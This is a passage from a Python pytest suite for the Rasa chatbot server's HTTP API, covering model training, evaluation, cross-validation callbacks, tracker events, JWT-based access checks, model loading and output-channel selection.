responses=responses_file.read(),
nlu=nlu_file.read(),
)
_, response = await rasa_app.post("/model/train", json=payload, timeout=60 * 5)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path)
def assert_trained_model(response_body: bytes, tmp_path: Path) -> None:
# save model to temporary file
model_path = str(tmp_path / "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response_body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
@pytest.mark.parametrize(
"payload",
[
{"config": None, "stories": None, "nlu": None, "domain": None, "force": True},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"force": False,
"save_to_default_model_directory": True,
},
{
"config": None,
"stories": None,
"nlu": None,
"domain": None,
"save_to_default_model_directory": False,
},
],
)
def test_deprecation_warnings_json_payload(payload: Dict):
with pytest.warns(FutureWarning):
rasa.server._validate_json_training_payload(payload)
@pytest.mark.trains_model
async def test_train_with_yaml(rasa_app: SanicASGITestClient, tmp_path: Path):
training_data = """
stories:
- story: My story
steps:
- intent: greet
- action: utter_greet
rules:
- rule: My rule
steps:
- intent: greet
- action: utter_greet
intents:
- greet
nlu:
- intent: greet
examples: |
- hi
- hello
responses:
utter_greet:
- text: Hi
language: en
policies:
- name: RulePolicy
pipeline:
- name: KeywordIntentClassifier
"""
_, response = await rasa_app.post(
"/model/train",
data=training_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert_trained_model(response.body, tmp_path)
@pytest.mark.trains_model
async def test_train_with_invalid_yaml(rasa_app: SanicASGITestClient):
invalid_yaml = """
rules:
rule my rule
"""
_, response = await rasa_app.post(
"/model/train",
data=invalid_yaml,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.parametrize(
"headers, expected",
[({}, False), ({"force_training": False}, False), ({"force_training": True}, True)],
)
def test_training_payload_from_yaml_force_training(
headers: Dict, expected: bool, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("force_training") == expected
@pytest.mark.parametrize(
"headers, expected",
[
({}, rasa.shared.constants.DEFAULT_MODELS_PATH),
({"save_to_default_model_directory": False}, ANY),
(
{"save_to_default_model_directory": True},
rasa.shared.constants.DEFAULT_MODELS_PATH,
),
],
)
def test_training_payload_from_yaml_save_to_default_model_directory(
headers: Dict, expected: Text, tmp_path: Path
):
request = Mock()
request.body = b""
request.args = headers
payload = rasa.server._training_payload_from_yaml(request, tmp_path)
assert payload.get("output")
assert payload.get("output") == expected
@pytest.mark.trains_model
async def test_train_missing_config(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config=None)
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_train_missing_training_data(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config="config data")
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_train_internal_error(rasa_app: SanicASGITestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = await rasa_app.post("/model/train", json=payload)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_evaluate_stories(
rasa_app: SanicASGITestClient, default_stories_file: Text
):
stories = rasa.shared.utils.io.read_file(default_stories_file)
_, response = await rasa_app.post(
"/model/test/stories",
data=stories,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
js = response.json()
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
@pytest.mark.trains_model
async def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicASGITestClient, default_stories_file: Text
):
stories = rasa.shared.utils.io.read_file(default_stories_file)
_, response = await rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == HTTPStatus.CONFLICT
@pytest.mark.trains_model
async def test_evaluate_stories_end_to_end(
rasa_app: SanicASGITestClient, end_to_end_test_story_md_file: Text
):
stories = rasa.shared.utils.io.read_file(end_to_end_test_story_md_file)
_, response = await rasa_app.post("/model/test/stories?e2e=true", data=stories,)
assert response.status == HTTPStatus.OK
js = response.json()
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert js["actions"] != []
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
@pytest.mark.trains_model
async def test_evaluate_intent(rasa_app: SanicASGITestClient, default_nlu_data: Text):
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
@pytest.mark.trains_model
async def test_evaluate_intent_json(rasa_app: SanicASGITestClient):
nlu_data = rasa.shared.utils.io.read_file("data/test/demo-rasa-small.json")
_, response = await rasa_app.post(
"/model/test/intents",
json=nlu_data,
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
@pytest.mark.trains_model
async def test_evaluate_invalid_intent_model_file(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents?model=invalid.tar.gz",
json={},
headers={"Content-type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_evaluate_intent_without_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post(
"/model/test/intents", headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
@pytest.mark.trains_model
async def test_evaluate_intent_with_model_param(
rasa_app: SanicASGITestClient, trained_nlu_model: Text, default_nlu_data: Text
):
_, response = await rasa_app.get("/status")
previous_model_file = response.json()["model_file"]
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
_, response = await rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = await rasa_app.get("/status")
assert previous_model_file == response.json()["model_file"]
@pytest.mark.trains_model
async def test_evaluate_intent_with_model_server(
rasa_app: SanicASGITestClient,
trained_rasa_model: Text,
default_nlu_data: Text,
tear_down_scheduler: None,
):
production_model_server_url = (
"https://example.com/webhooks/actions?model=production"
)
test_model_server_url = "https://example.com/webhooks/actions?model=test"
nlu_data = rasa.shared.utils.io.read_file(default_nlu_data)
with aioresponses() as mocked:
# Mock retrieving the production model from the model server
mocked.get(
production_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "production"},
)
# Mock retrieving the test model from the model server
mocked.get(
test_model_server_url,
body=Path(trained_rasa_model).read_bytes(),
headers={"ETag": "test"},
)
agent_with_model_server = await load_agent(
model_server=EndpointConfig(production_model_server_url)
)
rasa_app.app.agent = agent_with_model_server
_, response = await rasa_app.post(
f"/model/test/intents?model={test_model_server_url}",
data=nlu_data,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
assert set(response.json().keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
production_model_server = rasa_app.app.agent.model_server
# Assert that the model server URL for the test didn't override the production
# model server URL
assert production_model_server.url == production_model_server_url
# Assert the tests didn't break pulling the models
assert production_model_server.kwargs.get("wait_time_between_pulls") != 0
@pytest.mark.trains_model
async def test_cross_validation(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.OK
response_body = response.json()
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
@pytest.mark.trains_model
async def test_cross_validation_with_md(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text
):
payload = """
## intent: greet
- Hi
- Hello
"""
_, response = await rasa_app_nlu.post(
"/model/test/intents", data=payload, params={"cross_validation_folds": 3},
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_cross_validation_with_callback_success(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
mocked_cross_validation = Mock(
return_value=(
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
CVEvaluationResult({}, {}, {}),
)
)
monkeypatch.setattr(
rasa.nlu, rasa.nlu.cross_validate.__name__, mocked_cross_validation
)
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
# Sleep to give event loop time to process things in the background
await asyncio.sleep(1)
mocked_cross_validation.assert_called_once()
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["data"]
response_body = json.loads(content)
for required_key in {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}:
assert required_key in response_body
details = response_body[required_key]
assert all(
key in details for key in ["precision", "f1_score", "report", "errors"]
)
@pytest.mark.trains_model
async def test_cross_validation_with_callback_error(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
monkeypatch.setattr(
rasa.nlu, rasa.nlu.cross_validate.__name__, Mock(side_effect=ValueError())
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_callback_unexpected_error(
rasa_app_nlu: SanicASGITestClient, default_nlu_data: Text, monkeypatch: MonkeyPatch
):
nlu_data = Path(default_nlu_data).read_text()
config = Path(DEFAULT_STACK_CONFIG).read_text()
payload = f"{nlu_data}\n{config}"
monkeypatch.setattr(
rasa.server,
rasa.server._training_payload_from_yaml.__name__,
Mock(side_effect=ValueError()),
)
callback_url = "https://example.com/webhooks/actions"
with aioresponses() as mocked:
mocked.post(callback_url, payload={})
_, response = await rasa_app_nlu.post(
"/model/test/intents",
data=payload,
headers={"Content-type": rasa.server.YAML_CONTENT_TYPE},
params={"cross_validation_folds": 3, "callback_url": callback_url},
)
assert response.status == HTTPStatus.NO_CONTENT
await asyncio.sleep(1)
last_request = latest_request(mocked, "POST", callback_url)
assert last_request
content = last_request[0].kwargs["json"]
assert content["code"] == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_predict(rasa_app: SanicASGITestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, INTENT_NAME_KEY: "greet"},
"text": "hello",
},
},
]
}
}
_, response = await rasa_app.post(
"/model/predict",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json()
assert response.status == HTTPStatus.OK
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
@pytest.mark.trains_model
async def test_requesting_non_existent_tracker(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/conversations/madeupid/tracker")
content = response.json()
assert response.status == HTTPStatus.OK
assert content["paused"] is False
assert content["slots"] == {
"name": None,
REQUESTED_SLOT: None,
SESSION_START_METADATA_SLOT: None,
}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": 1,
"timestamp": 1514764800,
"action_text": None,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
INTENT_NAME_KEY: "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
"action_text": None,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
@pytest.mark.trains_model
async def test_pushing_event(rasa_app: SanicASGITestClient, event: Event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json()
assert tracker is not None
assert len(tracker.get("events")) == 4
deserialized_events = [Event.from_parameters(event) for event in tracker["events"]]
# there is an initial session start sequence at the beginning of the tracker
assert deserialized_events[:3] == session_start_sequence
assert deserialized_events[3] == event
assert deserialized_events[3].timestamp > time_before_adding_events
@pytest.mark.trains_model
async def test_push_multiple_events(rasa_app: SanicASGITestClient):
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json()
assert tracker is not None
# there is an initial session start sequence at the beginning
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == session_start_sequence + test_events
@pytest.mark.parametrize(
"params", ["?execute_side_effects=true&output_channel=callback", ""]
)
@pytest.mark.trains_model
async def test_pushing_event_while_executing_side_effects(
rasa_server: Sanic, params: Text
):
input_channel = CallbackInput(EndpointConfig("https://example.com/callback"))
channel.register([input_channel], rasa_server, "/webhooks/")
rasa_app = rasa_server.asgi_client
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = test_events[1].as_dict()
with aioresponses() as mocked:
mocked.post(
"https://example.com/callback",
repeat=True,
headers={"Content-Type": "application/json"},
)
await rasa_app.post(
f"{conversation}/tracker/events{params}",
json=serialized_event,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
r = latest_request(mocked, "post", "https://example.com/callback")
if not params:
assert r is None
else:
message_received = json_of_latest_request(r)
assert message_received.get("recipient_id") == sender_id
assert message_received.get("text") == serialized_event.get("text")
@pytest.mark.trains_model
async def test_post_conversation_id_with_slash(rasa_app: SanicASGITestClient):
conversation_id = str(uuid.uuid1())
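# Splice URL-special characters (slash, plus, minus, underscore, backslash,
# equals) into the middle of the ID to check the server still routes it.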
id_len = len(conversation_id) // 2
conversation_id = conversation_id[:id_len] + "/+-_\\=" + conversation_id[id_len:]
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = await rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json() is not None
assert response.status == HTTPStatus.OK
_, tracker_response = await rasa_app.get(
f"/conversations/{conversation_id}/tracker"
)
tracker = tracker_response.json()
assert tracker is not None
# there is a session start sequence at the start
assert [
Event.from_parameters(event) for event in tracker.get("events")
] == session_start_sequence + test_events
@pytest.mark.trains_model
async def test_put_tracker(rasa_app: SanicASGITestClient):
data = [event.as_dict() for event in test_events]
_, response = await rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
content = response.json()
assert response.status == HTTPStatus.OK
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = await rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json()
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
@pytest.mark.trains_model
async def test_predict_without_conversation_id(rasa_app: SanicASGITestClient):
_, response = await rasa_app.post("/conversations/non_existent_id/predict")
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
@pytest.mark.trains_model
async def test_sorted_predict(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = await rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json()["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
async def _create_tracker_for_sender(app: SanicASGITestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = await app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": rasa.server.JSON_CONTENT_TYPE},
)
assert response.status == HTTPStatus.OK
@pytest.mark.trains_model
async def test_get_tracker_with_jwt(rasa_secured_app: SanicASGITestClient):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
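# Aside: an equivalent token could be minted programmatically (hedged sketch,
# assuming the PyJWT package and the secret "core" mentioned above):
# import jwt
# token = jwt.encode(
#     {"user": {"username": "testadmin", "role": "admin"}}, "core", algorithm="HS256"
# )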
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
"2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
"HJHOxxC_w7TtwCrs"
}
_, response = await rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.FORBIDDEN
_, response = await rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == HTTPStatus.OK
@pytest.mark.trains_model
def test_list_routes(default_agent: Agent):
app = rasa.server.create_app(default_agent, auth_token=None)
routes = utils.list_routes(app)
assert set(routes.keys()) == {
"hello",
"version",
"status",
"retrieve_tracker",
"append_events",
"replace_events",
"retrieve_story",
"execute_action",
"trigger_intent",
"predict",
"add_message",
"train",
"evaluate_stories",
"evaluate_intents",
"tracker_predict",
"parse",
"load_model",
"unload_model",
"get_domain",
}
@pytest.mark.trains_model
async def test_unload_model_error(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "model_file" in response.json() and response.json()["model_file"] is not None
_, response = await rasa_app.delete("/model")
assert response.status == HTTPStatus.NO_CONTENT
@pytest.mark.trains_model
async def test_get_domain(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get(
"/domain", headers={"accept": rasa.server.JSON_CONTENT_TYPE}
)
content = response.json()
assert response.status == HTTPStatus.OK
assert "config" in content
assert "intents" in content
assert "entities" in content
assert "slots" in content
assert "responses" in content
assert "actions" in content
@pytest.mark.trains_model
async def test_get_domain_invalid_accept_header(rasa_app: SanicASGITestClient):
_, response = await rasa_app.get("/domain")
assert response.status == HTTPStatus.NOT_ACCEPTABLE
@pytest.mark.trains_model
async def test_load_model(rasa_app: SanicASGITestClient, trained_core_model: Text):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
old_fingerprint = response.json()["fingerprint"]
data = {"model_file": trained_core_model}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert old_fingerprint != response.json()["fingerprint"]
@pytest.mark.trains_model
async def test_load_model_from_model_server(
rasa_app: SanicASGITestClient, trained_core_model: Text, tear_down_scheduler: None
):
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
old_fingerprint = response.json()["fingerprint"]
endpoint = EndpointConfig("https://example.com/model/trained_core_model")
with open(trained_core_model, "rb") as f:
with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
headers = {}
fs = os.fstat(f.fileno())
headers["Content-Length"] = str(fs[6])
mocked.get(
"https://example.com/model/trained_core_model",
content_type="application/x-tar",
body=f.read(),
)
data = {"model_server": {"url": endpoint.url}}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.NO_CONTENT
_, response = await rasa_app.get("/status")
assert response.status == HTTPStatus.OK
assert "fingerprint" in response.json()
assert old_fingerprint != response.json()["fingerprint"]
@pytest.mark.trains_model
async def test_load_model_invalid_request_body(rasa_app: SanicASGITestClient):
_, response = await rasa_app.put("/model")
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_load_model_invalid_configuration(rasa_app: SanicASGITestClient):
data = {"model_file": "some-random-path"}
_, response = await rasa_app.put("/model", json=data)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_execute(rasa_app: SanicASGITestClient):
await _create_tracker_for_sender(rasa_app, "test_execute")
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post("/conversations/test_execute/execute", json=data)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
assert parsed_content["tracker"]
assert parsed_content["messages"]
@pytest.mark.trains_model
async def test_execute_without_conversation_id(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "utter_greet"}
_, response = await rasa_app.post(
"/conversations/non_existent_id/execute", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
assert response.json()["message"] == "Conversation ID not found."
@pytest.mark.trains_model
async def test_execute_with_missing_action_name(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_missing_action_name"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"wrong-key": "utter_greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_execute_with_not_existing_action(rasa_app: SanicASGITestClient):
test_sender = "test_execute_with_not_existing_action"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {"name": "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/execute", json=data
)
assert response.status == HTTPStatus.INTERNAL_SERVER_ERROR
@pytest.mark.trains_model
async def test_trigger_intent(rasa_app: SanicASGITestClient):
data = {INTENT_NAME_KEY: "greet"}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
assert parsed_content["tracker"]
assert parsed_content["messages"]
@pytest.mark.trains_model
async def test_trigger_intent_with_entity(rasa_app: SanicASGITestClient):
entity_name = "name"
entity_value = "Sara"
data = {INTENT_NAME_KEY: "greet", "entities": {entity_name: entity_value}}
_, response = await rasa_app.post(
"/conversations/test_trigger/trigger_intent", json=data
)
assert response.status == HTTPStatus.OK
parsed_content = response.json()
last_slot_set_event = [
event
for event in parsed_content["tracker"]["events"]
if event["event"] == "slot"
][-1]
assert parsed_content["tracker"]
assert parsed_content["messages"]
assert last_slot_set_event["name"] == entity_name
assert last_slot_set_event["value"] == entity_value
@pytest.mark.trains_model
async def test_trigger_intent_with_missing_intent_name(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_missing_action_name"
data = {"wrong-key": "greet"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.BAD_REQUEST
@pytest.mark.trains_model
async def test_trigger_intent_with_not_existing_intent(rasa_app: SanicASGITestClient):
test_sender = "test_trigger_intent_with_not_existing_intent"
await _create_tracker_for_sender(rasa_app, test_sender)
data = {INTENT_NAME_KEY: "ka[pa[opi[opj[oj[oija"}
_, response = await rasa_app.post(
f"/conversations/{test_sender}/trigger_intent", json=data
)
assert response.status == HTTPStatus.NOT_FOUND
@pytest.mark.parametrize(
"input_channels, output_channel_to_use, expected_channel",
[
(None, "slack", CollectingOutputChannel),
([], None, CollectingOutputChannel),
([RestInput()], "slack", CollectingOutputChannel),
([RestInput()], "rest", CollectingOutputChannel),
(
[RestInput(), SlackInput("test", slack_signing_secret="foobar")],
"slack",
SlackBot,
),
],
)
def test_get_output_channel(
input_channels: List[Text], output_channel_to_use: Text, expected_channel: Type
):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": output_channel_to_use}
actual = rasa.server._get_output_channel(request, None)
assert isinstance(actual, expected_channel)
@pytest.mark.parametrize(
"input_channels, expected_channel",
[
([], CollectingOutputChannel),
([RestInput()], CollectingOutputChannel),
([RestInput(), SlackInput("test", slack_signing_secret="foobar")], SlackBot),
],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
request = MagicMock()
app = MagicMock()
app.input_channels = input_channels
request.app = app
request.args = {"output_channel": "latest"}
tracker = DialogueStateTracker.from_events(
"default", [UserUttered("text", input_channel="slack")]
)
actual = rasa.server._get_output_channel(request, tracker)
assert isinstance(actual, expected_channel)
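# With output_channel=latest the server resolves the channel from the most
# recent UserUttered event's input_channel ("slack" here) and falls back to a
# CollectingOutputChannel when no matching input channel is registered.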
def test_app_when_app_has_no_input_channels():
request = MagicMock()
class NoInputChannels:
pass
request.app = NoInputChannels()
actual = rasa.server._get_output_channel(
request, DialogueStateTracker.from_events("default", [])
)
assert isinstance(actual, CollectingOutputChannel)
@pytest.mark.parametrize(
"conversation_events,until_time,fetch_all_sessions,expected",
[
# conversation with one session
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: greet
user: |-
hi
- action: utter_greet""",
),
# conversation with multiple sessions
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
True,
"""version: "2.0"
stories:
- story: some-conversation-ID, story 1
steps:
- intent: greet
user: |-
hi
- action: utter_greet
- story: some-conversation-ID, story 2
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# conversation with multiple sessions, but setting `all_sessions=false`
# means only the last one is returned
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
False,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# the default for `all_sessions` is `false` - this test checks that
# only the latest session is returned in that case
(
[
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("hi", {"name": "greet"}),
ActionExecuted("utter_greet"),
ActionExecuted(ACTION_SESSION_START_NAME),
SessionStarted(),
UserUttered("bye bye", {"name": "goodbye"}),
ActionExecuted("utter_goodbye"),
],
None,
None,
"""version: "2.0"
stories:
- story: some-conversation-ID
steps:
- intent: goodbye
user: |-
bye bye
- action: utter_goodbye""",
),
# `until` parameter means only the first session is returned
(
[
